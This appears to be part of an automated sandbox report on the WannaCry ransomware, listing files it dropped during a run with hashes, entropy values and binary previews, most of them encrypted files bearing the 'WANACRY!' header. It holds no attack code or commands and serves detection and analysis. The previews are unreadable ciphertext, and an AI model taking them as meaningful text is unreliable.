                                                                              Preview:WANACRY!....e.J...)~l?.xv..p.7.U..E..>......Y.*...kz.|..9`dg*...f.-.....uJ/......t..}.$.fP4..0".>...a.."*3I.%..\p.K.f7..}.\D...{z5...@....y:. k_..8.../.fvEf..&.h.....U.H...?.6....]j.a..Qp...o....j.c...y.0!.....=ka.#.....+.>i*.............1..9...I.X(....^............TA.w.TTO..q.GL....WKt..H...0+H.xs:B...^.....L.zKH.......`Y...-......U.o..2.9.X......,.G`...|EW.m.T ..7r%j....:.p.=.w..K.......wo.]..O|..y~l....,.E.E..l#...%.1..g.......G.......:....V.*...% .Cv...,:R...}..Rm.\.3L/".}...:'..>Q.....PSO..57......$RY...{j..3...$..)......J.L...."..M....[...i...'.K.<Z..}.......i.....4~.gV.q....|X8....A..QkW.R....P....iq...j.34.....J...........f........P{.$.Z......q+m......../.5b....hky....b.....c......x.y.L0Quz.gh..A.l.qp.v...r.F,<..u.<........Z.{.......j...X..%3..pM......*..Z.}a....G...w.Y.w..".......:..Kt.H..Q.y.rxdl~.-U..^.8..O....i...=3.0...8.....v.....V...x..."...AK.....4....H.:v..4.....r....L.o...U.S.T.Kq.q.K.0w....e...F.*....Z..ks...q<+..I
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8502429492249055
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkEPykM9q+GSJgpyPh781XfT2TbHjuDZUZQjrqCQBNqWSw/4HPtRu8sOtWhOvWN8:bkET8q4D7mPwHju+Y4BNqWSwCO8s3OOa
                                                                              MD5:383162B4FCF093CE08B7BC66AE43A600
                                                                              SHA1:8FC606822EEAA72DE58EA5DA22CCC4A97C81B721
                                                                              SHA-256:5DA8C94A1A1472C7D019F8E4DA1E1B7589B0DBEBD8227A65D6D93F2FFB99CD00
                                                                              SHA-512:421D0B8285327C6357AB1FA9116B2A3715AE28E82697113A9E95C44818E3CFACCAD8F933B39DA40EE5EC570153AFD0EF7A6B0A23A6BB147F9BC0C5A6595577C0
                                                                              Malicious:false
                                                                              Preview:WANACRY!....e.J...)~l?.xv..p.7.U..E..>......Y.*...kz.|..9`dg*...f.-.....uJ/......t..}.$.fP4..0".>...a.."*3I.%..\p.K.f7..}.\D...{z5...@....y:. k_..8.../.fvEf..&.h.....U.H...?.6....]j.a..Qp...o....j.c...y.0!.....=ka.#.....+.>i*.............1..9...I.X(....^............TA.w.TTO..q.GL....WKt..H...0+H.xs:B...^.....L.zKH.......`Y...-......U.o..2.9.X......,.G`...|EW.m.T ..7r%j....:.p.=.w..K.......wo.]..O|..y~l....,.E.E..l#...%.1..g.......G.......:....V.*...% .Cv...,:R...}..Rm.\.3L/".}...:'..>Q.....PSO..57......$RY...{j..3...$..)......J.L...."..M....[...i...'.K.<Z..}.......i.....4~.gV.q....|X8....A..QkW.R....P....iq...j.34.....J...........f........P{.$.Z......q+m......../.5b....hky....b.....c......x.y.L0Quz.gh..A.l.qp.v...r.F,<..u.<........Z.{.......j...X..%3..pM......*..Z.}a....G...w.Y.w..".......:..Kt.H..Q.y.rxdl~.-U..^.8..O....i...=3.0...8.....v.....V...x..."...AK.....4....H.:v..4.....r....L.o...U.S.T.Kq.q.K.0w....e...F.*....Z..ks...q<+..I
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.808130402300298
                                                                              Encrypted:false
                                                                              SSDEEP:24:u+l3yzFNlJyDcBYfB8xEkf5rFMYx+s7zbtnUbf9JP/2vsZ:u+l3yRNlJyDcBUB8akfd6Yx+at0f9J2k
                                                                              MD5:89CCA84664EAEEA8A4FF0C4D8EBA112D
                                                                              SHA1:4E4BF285912D16133F2F91B600DC2116796DE40F
                                                                              SHA-256:CBE074DF8944F820D0B9478947244EC0CAA0332CDBC459DFAFEDF7CFC914F193
                                                                              SHA-512:0C47C32E76C0FADAFB966EAC71ADFF84EF51199891D6B3366EB10CECDEFE72005A0C9D63115279017F18E7B1477912F2E831CD2040E51312DCAAA71039E14ECF
                                                                              Malicious:false
                                                                              Preview:..XU$_..y...\.../.o.fB..F.z{....7$.~#u..j...CV+....DnV.....V....yO.%}........'.......q0......#... ;.$...S.-..._. .vy...Ld...rJ6.6...... .....#j.D.......d..w.u...2.=...a...o/..h.L.X>c..(....n.>.V..b...o.Q..W....N....m.....V.e.z.D...`.S..X;.Q.!..U..;..$...w.F...........Qj.H..[A..x.ZO~f.`h...E..?.a......I..K..\..KL-...5..!..+.@q.w[......E......7...k~........W2wI.@...../..~..u3K.]..x......B.]..B.,..T....|{......=^F..D..7j^......pG._..5F;..\{2*_.M.y......a.]......woyN....P >\p.S..R...%.<..G$.s...6.s..QPe..0DS.A.T..^.R9h1...}!:.>.N`..u=.cb....r...mbO...\..S.....g(GG2....@....A..S.8*W.6..?m..g.......|..)...B.ip-f#n..>Y.I....> ......$...7)....A@.......X.Xr.s.>F..D..W.=.Oh=..v./6cI...K.,{'......`.\U.E...t...mU~v.Y~...SX..$.<.IA.s.f....j.Q..O..Y.9.a3!..r...Q..k..i.ak[.....U....qi.T.'..+....V....n._....5....9.M%.E.C.e...2w.G. 56.....7../:.@1....f.A.Z*[=p}.[....)W.R/{.././..2.z.Z"......e..\....;..FZ=..&.s........a...q.`......E...`9.rBY.|i....&.........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.845541821262533
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkAueXm2XZo4hS0T/AM+hRF7K5IRVm685UsyglYcMAZ/3VNFVrRzN6WVRkoJJ:bkAue22XZNYM8D7KyHWUIaAZ/3Hvr/tn
                                                                              MD5:D20A17FC6C213DF571FB90BAD5216D7C
                                                                              SHA1:C42CF434396075D61CF5CD0115D2DBD157AC64F6
                                                                              SHA-256:2E0EC8A6660CAA23C9F96CBEC67FC2EEC9C0EF4DAE1CA105C6C607F57295CBF8
                                                                              SHA-512:1943D28CF363A3441A44B5D4A7CD257B46A0CEE6CBE991AC6809FC2B43F97D1ACAC3F3F23243A6D33E5EE1D1908EBC6DD93692074283A677A4430601E026C28E
                                                                              Malicious:false
                                                                              Preview:WANACRY!......C......."...KZ......s..Cf........Fu.PI..R..G.X.....`..f.....,.iw.GW.e...o..n.._.^.....A.W._l..f........B...f....0/.t...M*..;.J...._]..z.B#.V..Q.S".l.7.........z.O6.p`D^n....q.j.....Q....a.D.9}uA#...W.m...kl....g....h.q..qC.{..o0U...Vy.iz..............T.~.j.bx-Y!t...6.....'."?&p.h..T(.~...'&..k..8...A.]7'.."<..R|/.A....c...b...x.-+.....x..D.<.v.q..A.qP....=.9...L(..._r....hb...z.E..S.,!.I...I.\...m.$....(C....>gX.:.!1r...a9.....^.z.%...1...x.*\..q.B{4.."...:.S..O#,.f......jV.qp}f8 ..%.]2.S1vMJ..(d...9C..d......y...g.y[.....B[....V.'....U...B..2.._s.....MB...`......E....`.J.T...7;'..^.,...K3..wo?..2...[...=..\..Y....{...]P....l|.b.8}(J.._J...b.R.c.1..J..f.P....1?......N`.e....Gd2...6.O.*.D.7.....I?.../..job..pViG*..*h.d...C.N.U.._i...._.......F<D.....ofQ..7*MaA....<..v,Ed.u.^.?.Z}....4W...!...8.....=....U_.J:8e..-8..l.Z...!..X..2.s5.T..n.(0..vp.O.nE..j..7.GZ....k.t......{Z<.....C....GE..cU...;k...4-.....S..7.r.?.|..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.845541821262533
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkAueXm2XZo4hS0T/AM+hRF7K5IRVm685UsyglYcMAZ/3VNFVrRzN6WVRkoJJ:bkAue22XZNYM8D7KyHWUIaAZ/3Hvr/tn
                                                                              MD5:D20A17FC6C213DF571FB90BAD5216D7C
                                                                              SHA1:C42CF434396075D61CF5CD0115D2DBD157AC64F6
                                                                              SHA-256:2E0EC8A6660CAA23C9F96CBEC67FC2EEC9C0EF4DAE1CA105C6C607F57295CBF8
                                                                              SHA-512:1943D28CF363A3441A44B5D4A7CD257B46A0CEE6CBE991AC6809FC2B43F97D1ACAC3F3F23243A6D33E5EE1D1908EBC6DD93692074283A677A4430601E026C28E
                                                                              Malicious:false
                                                                              Preview:WANACRY!......C......."...KZ......s..Cf........Fu.PI..R..G.X.....`..f.....,.iw.GW.e...o..n.._.^.....A.W._l..f........B...f....0/.t...M*..;.J...._]..z.B#.V..Q.S".l.7.........z.O6.p`D^n....q.j.....Q....a.D.9}uA#...W.m...kl....g....h.q..qC.{..o0U...Vy.iz..............T.~.j.bx-Y!t...6.....'."?&p.h..T(.~...'&..k..8...A.]7'.."<..R|/.A....c...b...x.-+.....x..D.<.v.q..A.qP....=.9...L(..._r....hb...z.E..S.,!.I...I.\...m.$....(C....>gX.:.!1r...a9.....^.z.%...1...x.*\..q.B{4.."...:.S..O#,.f......jV.qp}f8 ..%.]2.S1vMJ..(d...9C..d......y...g.y[.....B[....V.'....U...B..2.._s.....MB...`......E....`.J.T...7;'..^.,...K3..wo?..2...[...=..\..Y....{...]P....l|.b.8}(J.._J...b.R.c.1..J..f.P....1?......N`.e....Gd2...6.O.*.D.7.....I?.../..job..pViG*..*h.d...C.N.U.._i...._.......F<D.....ofQ..7*MaA....<..v,Ed.u.^.?.Z}....4W...!...8.....=....U_.J:8e..-8..l.Z...!..X..2.s5.T..n.(0..vp.O.nE..j..7.GZ....k.t......{Z<.....C....GE..cU...;k...4-.....S..7.r.?.|..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.803578256493422
                                                                              Encrypted:false
                                                                              SSDEEP:24:qAvVBUfHT9NaZFaYwD3XL2iHYh9BL7FK5jTlln7VW4z:bCz9NaZFaHyeyBLwjD7VW4z
                                                                              MD5:3B5970397769BD90C362F2754FC882B9
                                                                              SHA1:92249D263F5B49451DE121BCB531805BA9C05C92
                                                                              SHA-256:F5CFC5D232B58D76DAC94D4EC4B03A976CDF0E85ADFCC20A23B2BB13B39B6E01
                                                                              SHA-512:AFB4A7D7BE8FD1110D4B30EDB5001BF3144A1612ECD55D14B54CE37226F1E11FD9D9F0E5339BA90263386E0D8E852178DE181F235EB97A208C361403AE5A40C5
                                                                              Malicious:false
                                                                              Preview:..?A.Ih..,.........u.s+.....)..w..c.?3.d\2...+..c.Y...3.I@...R..fn65$..3.L.......t.c*..R`.Nz.Fq.e@S.....hK.1....1.uL...v.+....J...Y7.!.K....*.YJ..A7....[e.q.h.9..c...4)....P..^..X.....#.....@....v$<..`..!...V......&..+.../.....U...7g..!..='.X].-...X..}p9E.a..0n..[..h..8..u..E.Pwt,..u..*..D..*..<..5-./M......~,......|...l.F.... u.!........[.M..y.m.'.'.....i.b#yS.N4]j#........l.YJT.....U..n.....B...bKf.f.Ee..6h..E.'...Z..G.Y...J.v.`S`.......o.......6.).=...W........q.........[....%.........W(......iMj...7.f{..z.?.d[..O..*'p.bTO.E{J.{..8.2O.....C.@.......U...bpr.3...}...EC.0...|8_..3:.oP,.E.@.\......;;q].h?..........$ d..6.j..2&.^.....5.-[~.s...Zo....&...Y...{.W..g...T.b..7.o.P .D..F.e.2Y.(l<.2...jH*,...6}s....u......X.....C...MC..j...mr......T..P~.....S.*dkg.PE.wi.#.Rq?.....{Y....m..n.......yG.7#{.....^.vw2.m.c|G....,.|zF2...O..0.\..../.vm.n y..*.b..'...0mjcI....3..Z.......L(.w....;..;<0T......).Py;aFk6.&49..>%...Y. .#..Y..Y.C
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.839162213612984
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkxD/e2SSYEhoMNhWYwo/N1nkjUxhMuAn4BULV8NvOoihOU9oJuczr3cgwb:bkxhSSYE+Mngc1+whVBU+vfi0U2Rr3cx
                                                                              MD5:829597BA068415B24AE4DA92992E4AAD
                                                                              SHA1:B3347D119ADE3CF57BFF17E865BCDEFCA4803AE7
                                                                              SHA-256:BE7FA562F5CA38F2FD72B1F99E98AE3B5AF03D043826F40A48179150D52CF48F
                                                                              SHA-512:0AA391542736AE690E3313C14F5963AF7BAC3955C1265B76C1F3B45C9A4A469B00CD914892D16D786680287B975F457536831F14BB46B3EBE768A93AA8F81D7C
                                                                              Malicious:false
                                                                              Preview:WANACRY!....q..9v..Kn...'v.:gY......X+.=...^.x"54....O{-...G4&$.Z.<w.+.#.?p=W.......QI.h./.a..q...Q...5.y.Y.1.m..+^....N.4%.tQ..........<..[....@.^..\#J?.1..a..[...NJ.Ntl.....X......@..dC'3....7..q........,.i.oP..,F........ZNe`..N.=...4..Cw^..q.P.}o......... .............C.,T^.p....3..C. ....`....w.2-..xy3....L<f..c.QagT).`.G.Um..>.}..M......6.oK...%.@+.+k..?..#..|.8F.......dk2.........zH..r1l...k^...\o..y.Ve....W.r.=.G.........].....u.<C....D..D...({..B!+.c.#.m&[......j.?:..V.....+P.VJ............1.....Q..~..R....I...U;M...+......y......]K.i..D:.t...4a6.N....'..v.y.#2......a40..1....`.e.3J{\.~].-=U...f.nl...{Q.5k..z..\b.g.84.G....F..IU.....!m.>mR?.J.n&.U._L.......shm........V.Us.?.GOo.......M-..q...}?......|....l^.BS...._..?...TT.)\.a%.k...7...>Di.L.1..\.A....M..)...p.Z..A..hv..n......l...V..k.....M....A......i.#.....f'.}pZ...?e|.zz+...@..(1"..}a../.....?.<..M.>..a..NT.K...h.9l3....N.b..w.K..f.m.].E 0....z..NZy.`..Xz.c.=.<.,...\..a...h.....>d.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.839162213612984
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkxD/e2SSYEhoMNhWYwo/N1nkjUxhMuAn4BULV8NvOoihOU9oJuczr3cgwb:bkxhSSYE+Mngc1+whVBU+vfi0U2Rr3cx
                                                                              MD5:829597BA068415B24AE4DA92992E4AAD
                                                                              SHA1:B3347D119ADE3CF57BFF17E865BCDEFCA4803AE7
                                                                              SHA-256:BE7FA562F5CA38F2FD72B1F99E98AE3B5AF03D043826F40A48179150D52CF48F
                                                                              SHA-512:0AA391542736AE690E3313C14F5963AF7BAC3955C1265B76C1F3B45C9A4A469B00CD914892D16D786680287B975F457536831F14BB46B3EBE768A93AA8F81D7C
                                                                              Malicious:false
                                                                              Preview:WANACRY!....q..9v..Kn...'v.:gY......X+.=...^.x"54....O{-...G4&$.Z.<w.+.#.?p=W.......QI.h./.a..q...Q...5.y.Y.1.m..+^....N.4%.tQ..........<..[....@.^..\#J?.1..a..[...NJ.Ntl.....X......@..dC'3....7..q........,.i.oP..,F........ZNe`..N.=...4..Cw^..q.P.}o......... .............C.,T^.p....3..C. ....`....w.2-..xy3....L<f..c.QagT).`.G.Um..>.}..M......6.oK...%.@+.+k..?..#..|.8F.......dk2.........zH..r1l...k^...\o..y.Ve....W.r.=.G.........].....u.<C....D..D...({..B!+.c.#.m&[......j.?:..V.....+P.VJ............1.....Q..~..R....I...U;M...+......y......]K.i..D:.t...4a6.N....'..v.y.#2......a40..1....`.e.3J{\.~].-=U...f.nl...{Q.5k..z..\b.g.84.G....F..IU.....!m.>mR?.J.n&.U._L.......shm........V.Us.?.GOo.......M-..q...}?......|....l^.BS...._..?...TT.)\.a%.k...7...>Di.L.1..\.A....M..)...p.Z..A..hv..n......l...V..k.....M....A......i.#.....f'.}pZ...?e|.zz+...@..(1"..}a../.....?.<..M.>..a..NT.K...h.9l3....N.b..w.K..f.m.].E 0....z..NZy.`..Xz.c.=.<.,...\..a...h.....>d.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.813154710054012
                                                                              Encrypted:false
                                                                              SSDEEP:24:GTVY6H/crR+5lcxNDrf+TU+b9UzHm5wwHN2:wV5f183Ub9qSpHY
                                                                              MD5:0DC1EEFD35FBCFF974B3A42DAF0F32A4
                                                                              SHA1:5E1B90B000A17BB867DA05B5DC64B210E135A1A9
                                                                              SHA-256:FA2191BEE98CFD71412C89B156FD0B2FBAC4386A1E70CB3F9E268A4BE56885A7
                                                                              SHA-512:9EFBB42280E39763886622B99968AA0EFA5A06DF2A654393D06CD618DC51FC37F57B375A8122E244676E65EEF2D9699F3ACA20168B0273B79B360715019F56AA
                                                                              Malicious:false
                                                                              Preview:..m..+.............1.|.6......,e..J.E....60.t....qn..4.0.....z.....w..mO%E...A..8..r.}t>.Z.6..Sjt<.F.l........e..$...b..l....o.....'.q.;.|.+...mVs^..e.%'.U{.._G.n...1.L..n."h.{.)O..w.f.7;..D.4.Jj...."q[...7P.}.w.?.J...X...3...(.g;..<]........dI.......o....Z)...C.T6.l..$..'....BEO...=.....9.M.....~..,B..*hz}..HQ.O[.c.m.g...}.%.P..#l....^..12Q/.j.d..O. ..:...w*...J5U.0=.W5(u.. [..^.K.Y}w`j@...<\....2..Y.IbD.HK....>i..(...{..0<.&.}...L4..a*.P..6.k9~nj...8 .M...S....wN.....X.6..(.K....8b^..^...m.W}.;.@KrU.+...Mu&.P..R.U.@#..F`.....q.?.M...k.:..c>'K/........{.._..(.....s..w.w.+.:..."...d.$..r.)..i..-@>....._.7V..J..I.$.]i.4....h......W."..c..[....A..M...X........"....oZ......R..Y.'-j.=.L.9....R.(.y.Y...~.m..g...8.}y.~.1...N....AQ...My.h....n$..i.D]...9..b..k6..h%5UF.......D...Q..]......@..zPR.U(..>..5.v..Y.CT$N....1.....Fg.NbGUAp..'.r...0..O...0..|f.h......l}YM+...r:..K.A....l...............wM..f.Ij"..w.0B...P.s..n.....3..g...@...n?.(>.N..N9}.wz
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.853558959746625
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkKulCZH20GoUiQ9mwSOJuGrVmtXe5Jh7thkAvQ19p5eDbFgydYzdVNtUBa1L:bk/lCLAt9mwSOHZmR4DtiakUbFkzdVNl
                                                                              MD5:10F5525C3B004F70DD9A57440FD7CC9F
                                                                              SHA1:03BA052E8744540F35BFCEA40A957873820DA089
                                                                              SHA-256:F1682FAE6EA37D20BBF648CB191D223D1BEC74BA5062B22F9B464B50C351C0E9
                                                                              SHA-512:E611C64F18AACFAD68C7CDCCDDEF88A1A568BB1944859B5F84C8848D54BC44F9115B6C2D0CBCC637B39D31DAE53A6172D1E338615FEDFC2DE4CCB1BD1EB0EA28
                                                                              Malicious:false
                                                                              Preview:WANACRY!...........0..G"..0.d...Y..dB.S...i.f.@.c.;..........)...~.@.4.n=.B@Y.(.....\s..J)\$.%...9.24.5....F.I...1N"../....w.M...m.Gq....KC.F.Q.@b..............y..6..q..{.....H...y..O.5.....z.d.k.f.l..p.P.M...;.L>..:....6.7E...pym.v.I.%Ou.....*V...w..`............U.......).N..>...X..i. ....<B~f..1BD>9....qta...`\$.....6,..G..p...|Ym.S...o..Y2.".%.}.L...g....k..Vn.`!Z1T.."b.J.FA..|...Q+.6t.b..*..2..9..6..AD...I.u7.j..ko...$..t.C........6.......K.dB...&...[.E....UA..G/a.f..>......pM....?3"...g..%.....}...Y..t..........!..><....H..].......wl........).1...(..R$....h.T.......H....LB#C/...>..1.........G.. ....$5.8..M....(.....M@.z=L..*...C.!_.u9^&..t*....E.]....+.fp.......p.......vl..z_.V.F.s..v.....|..}......YG.\\}dUI.B..jL....Ga?x...4.E.........V...A..>8...b......mU.*...#..*...L..=.C...{.P.9.X.h...^....;..I.G.WN..98Q.~9.........U_..]...-.J...Jm.....!...m..Y..[u...Fs.@...Qu,..a....".........A.../..)>....J.....g...{.un.....4..q...'c.p
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.853558959746625
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkKulCZH20GoUiQ9mwSOJuGrVmtXe5Jh7thkAvQ19p5eDbFgydYzdVNtUBa1L:bk/lCLAt9mwSOHZmR4DtiakUbFkzdVNl
                                                                              MD5:10F5525C3B004F70DD9A57440FD7CC9F
                                                                              SHA1:03BA052E8744540F35BFCEA40A957873820DA089
                                                                              SHA-256:F1682FAE6EA37D20BBF648CB191D223D1BEC74BA5062B22F9B464B50C351C0E9
                                                                              SHA-512:E611C64F18AACFAD68C7CDCCDDEF88A1A568BB1944859B5F84C8848D54BC44F9115B6C2D0CBCC637B39D31DAE53A6172D1E338615FEDFC2DE4CCB1BD1EB0EA28
                                                                              Malicious:false
                                                                              Preview:WANACRY!...........0..G"..0.d...Y..dB.S...i.f.@.c.;..........)...~.@.4.n=.B@Y.(.....\s..J)\$.%...9.24.5....F.I...1N"../....w.M...m.Gq....KC.F.Q.@b..............y..6..q..{.....H...y..O.5.....z.d.k.f.l..p.P.M...;.L>..:....6.7E...pym.v.I.%Ou.....*V...w..`............U.......).N..>...X..i. ....<B~f..1BD>9....qta...`\$.....6,..G..p...|Ym.S...o..Y2.".%.}.L...g....k..Vn.`!Z1T.."b.J.FA..|...Q+.6t.b..*..2..9..6..AD...I.u7.j..ko...$..t.C........6.......K.dB...&...[.E....UA..G/a.f..>......pM....?3"...g..%.....}...Y..t..........!..><....H..].......wl........).1...(..R$....h.T.......H....LB#C/...>..1.........G.. ....$5.8..M....(.....M@.z=L..*...C.!_.u9^&..t*....E.]....+.fp.......p.......vl..z_.V.F.s..v.....|..}......YG.\\}dUI.B..jL....Ga?x...4.E.........V...A..>8...b......mU.*...#..*...L..=.C...{.P.9.X.h...^....;..I.G.WN..98Q.~9.........U_..]...-.J...Jm.....!...m..Y..[u...Fs.@...Qu,..a....".........A.../..)>....J.....g...{.un.....4..q...'c.p
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:OpenPGP Secret Key
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.803221394363508
                                                                              Encrypted:false
                                                                              SSDEEP:24:1l/4UEPD1fk3dsPuSjoJg3TH33xDwOFNQ3Arlq:kUEPD18gu0dT3xDFQ32Q
                                                                              MD5:0E7EC5A915B94D9206EC3B465E189434
                                                                              SHA1:15A06A25757B49CFD101B53646F11A1A458F0AD5
                                                                              SHA-256:C0BE393CCD38A9154D9E430C731B1CF84A6DE2ACF15BDFAE1ADE91A14099CED4
                                                                              SHA-512:14F9663360EF17F8DF5CE60363ACA75EE905C6BB893C28B2EAADB1F9DBC656601825AA56EF48AC22BF0F79A661CE8ADA3A93473E59B58FAD5E4E07D1C80FCD69
                                                                              Malicious:false
                                                                              Preview:.M,..j"G..y.[.rf^..t........f....a...1a...@.>.G.......v..iD<O.E9..*@...D.`.+K.=.rp..~.........a.K.;3.....L.#..s!....5..3.W2.................(./.:..(C..J>M..<uD..3....{....X..C.!.Y..W:.L>...m.?.S...K..t....OG3s.MkX".D.......?.......?~h.&...1....s.D.'.....u.sC..;...AT.m..;,.6....6n...#=.Pn.........)?y@f.j..#9..X..d.y8....n..*..*.|K7.9...\m..h..N........w..u..u..xD........UU.0.z5c...}E.aM"dx`.`...D......!W....\..?>..Y........|.q....a.PV.......nQ<.m.+.../Zk.*...G7UL.<.Z./p....m..4.#..A.m.../kH~.8X...{.Y..>.Z..._....)..bAl...S.h....3J.?}.....+...L..LLY..x.......(.D......<......:u..../.X../R{.......Q..D(.F..E}.lE$.(.Q.x..........z.....4. ...(....h.(....OR.SyGs."..9.\A...[..Y0.....b.:....R..[H.L..D.L......E.....c^..u"IG.a...ty|..m.R..B.5[`.. ...Z&.Di......?....p..D..K.`........>.........l.O...7....i.7..S..!..........r......R...3J_.........s..B<....1oYu.)_..J.......t.13...z.*S..'P..+..wb%_A.n.M...Oe.*..D.E..Bq.......'U......F*u.....Rlv(..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.842151088677232
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkumlOWQf9XjFv0TtpGTZs3Az2N/BtgkmGIHjVioaMnIJwenKN0OLVi1/0/9TILU:bkumlOTfZGTtpGOAi/BtglGIHclfLKCS
                                                                              MD5:05774611F44D2CB1FCCDC595E1065B77
                                                                              SHA1:C977C32C1521F62F94272DAA28B77651B6CAE76B
                                                                              SHA-256:E6364AD3576F99A5E2415997969E48E24BD9EF46804C424596F5A124F29C6214
                                                                              SHA-512:F1F1A2EA71B7C8C20752C8B1C5C358E752D55129B344B0D0B6AA5A005FD8D18AB031EF5FB25F9363B890423D4858F48EBBEEE9E8F1A869333D7368810A79B3A7
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....O.9E...?.c......:.}...6..........s7..M4PQ.$%....@...J...hf.sD.q....0[p.Q...n..D3L.%.S.A........6b...h$....*.....-{.W0..../...E.s..*.{7..g..o.$WN.4.......c..m0..9...Ct..ac..^....y....eHd......"9.`.".....*.......4.\.tI.f..M..-..@<C.......E...............:M....@.y............+E]..Z..g.....FwQ..5}.........4z5*P....d./E..R....].O8......?I..N.!Q..v7x...c.+.x'X...c...?=j..3..`Uk...[..~).C...( t..I...v.e..K...\65.C.TrC0..KW.,...=...y.%..#.S....A.....h3..WA<l.......\....k...S.o".)...e........O..D..+.....mkn.d.U:,..O....r..i..:..4H".C..-..n...*.aS.OcUc.LC...Z..b..(3(L.*B..q.I..XR...........&.<Ux.......Ci?0.C...._.nZ..6.2rI......[....A.*..E1.l?W;..E.7...g.k....R.....J......"..:.Y.. \...|......*.^......36..}XI.aJ...5..h..$x...?K{....D.....u.V.....6.q..l.g.Q]J.OP.....p.K..f....$........drO.Xs.......<*...w....66..K.....1.Bc...E...^...g...?.....[Q.. v..:,S.....e..*.>&.Er.wvA..O'.A...M}....!g..:.8...r.)37.l.C2.%U}..,.-..a....g../
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.842151088677232
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkumlOWQf9XjFv0TtpGTZs3Az2N/BtgkmGIHjVioaMnIJwenKN0OLVi1/0/9TILU:bkumlOTfZGTtpGOAi/BtglGIHclfLKCS
                                                                              MD5:05774611F44D2CB1FCCDC595E1065B77
                                                                              SHA1:C977C32C1521F62F94272DAA28B77651B6CAE76B
                                                                              SHA-256:E6364AD3576F99A5E2415997969E48E24BD9EF46804C424596F5A124F29C6214
                                                                              SHA-512:F1F1A2EA71B7C8C20752C8B1C5C358E752D55129B344B0D0B6AA5A005FD8D18AB031EF5FB25F9363B890423D4858F48EBBEEE9E8F1A869333D7368810A79B3A7
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....O.9E...?.c......:.}...6..........s7..M4PQ.$%....@...J...hf.sD.q....0[p.Q...n..D3L.%.S.A........6b...h$....*.....-{.W0..../...E.s..*.{7..g..o.$WN.4.......c..m0..9...Ct..ac..^....y....eHd......"9.`.".....*.......4.\.tI.f..M..-..@<C.......E...............:M....@.y............+E]..Z..g.....FwQ..5}.........4z5*P....d./E..R....].O8......?I..N.!Q..v7x...c.+.x'X...c...?=j..3..`Uk...[..~).C...( t..I...v.e..K...\65.C.TrC0..KW.,...=...y.%..#.S....A.....h3..WA<l.......\....k...S.o".)...e........O..D..+.....mkn.d.U:,..O....r..i..:..4H".C..-..n...*.aS.OcUc.LC...Z..b..(3(L.*B..q.I..XR...........&.<Ux.......Ci?0.C...._.nZ..6.2rI......[....A.*..E1.l?W;..E.7...g.k....R.....J......"..:.Y.. \...|......*.^......36..}XI.aJ...5..h..$x...?K{....D.....u.V.....6.q..l.g.Q]J.OP.....p.K..f....$........drO.Xs.......<*...w....66..K.....1.Bc...E...^...g...?.....[Q.. v..:,S.....e..*.>&.Er.wvA..O'.A...M}....!g..:.8...r.)37.l.C2.%U}..,.-..a....g../
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.810817450449458
                                                                              Encrypted:false
                                                                              SSDEEP:24:WJP/6CoKs8oo40tYolnobzjZMmpcF6J7C4Ufs/+AzgfTY:WJar3rPmYy8zOmI4UfAzg7Y
                                                                              MD5:C56BCF10A25D885203EA798EDF04FC19
                                                                              SHA1:E00C71DDA2A372325D47946A5BDBBEF17B2111B6
                                                                              SHA-256:C5BCBD24235A8E5EB6C26CFE3D0E9EB9ACD44E67FF6D798F2F92BFFE846B912E
                                                                              SHA-512:68B8BE025271E79D0351DD0657C9F50A8192F4EA4CEEA5029AD0F376E5FB11D9C753C7A8103E31D60826CBF5F94D7AFB0869DFB01D1F44E788A4ABD4B6594A10
                                                                              Malicious:false
